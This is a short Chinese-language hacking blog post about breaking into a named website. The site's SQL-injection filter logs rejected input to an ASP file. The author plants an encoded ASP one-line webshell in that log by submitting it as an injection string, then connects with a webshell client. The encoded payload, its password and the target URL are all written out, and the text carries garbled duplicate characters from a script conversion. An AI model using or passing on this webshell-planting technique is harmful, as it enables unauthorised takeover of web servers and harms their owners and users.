今晚群里朋友叫看個站，有sql防注入，繞不過，但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。

既然做了記錄，再查看了下它的記錄文件

于是想著構(gòu)造個asp一句話寫進去，前面幾種沒加密的都失敗了，于是寫了個加密的
┼攠數(shù)畣整爠煥敵瑳∨≡┩愾 密碼a(加密方式是: ANSI->Unicode)
提交and 1=┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

http://www.jnb1.net/sqlin.asp 菜刀連接之，成功


+----------------------------------------+
其實過程并不難，也沒什么技術(shù)難度，但是有時遇到這種記錄注入錯誤的網(wǎng)站，多個便捷途徑還是不錯的。還有，另外百度了下，發(fā)現(xiàn)半坑土農(nóng)民曾經(jīng)發(fā)現(xiàn)了類似的，但是，額，去他博客看時 , 瀑布汗

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。